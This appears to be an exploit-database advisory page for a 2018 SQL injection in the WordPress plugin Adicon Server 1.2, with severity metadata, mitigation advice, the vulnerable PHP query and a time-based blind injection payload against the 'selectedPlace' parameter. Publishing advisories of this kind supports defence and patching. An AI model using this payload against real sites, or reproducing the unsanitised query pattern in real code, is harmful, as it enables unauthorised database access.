header-logo
Suggest Exploit
vendor:
Adicon Server
by:
Kaimi
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Adicon Server
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: NO
Related CWE: N/A
CPE: 2.3:a:wordpress:adicons:1.2
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Webapps
2018

WordPress Plugin Adicon Server 1.2 – ‘selectedPlace’ SQL Injection

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'selectedPlace' parameter of the 'addIcon.php' script. A remote attacker can execute arbitrary SQL commands in the application database, cause denial of service, access or modify data, or exploit vulnerabilities in the underlying database. An example payload is 'selectedPlace=1 AND (SELECT * FROM (SELECT(SLEEP(1)))abcD); -- -'

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL commands that are passed to the database. The application should use parameterized queries, or stored procedures, to ensure that user-supplied data is handled securely.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin Adicon Server 1.2 - 'selectedPlace' SQL Injection
# Date: 2018-12-28
# Software Link: https://wordpress.org/plugins/adicons/
# Exploit Author: Kaimi
# Website: https://kaimi.io
# Version: 1.2
# Category: webapps

# SQL Injection
# File: addIcon.php
# Vulnerable code:
# $placement=$_POST['selectedPlace'];

# $x=explode("_",$placement);
# $ck=$wpdb->get_row("select id from ".$table_prefix."adicons where adRow=".$x[0]." and adCol=".$x[1]);

# Example payload:
selectedPlace=1 AND (SELECT * FROM (SELECT(SLEEP(1)))abcD); -- -

Navigation

Suggest Exploit

Services By CQR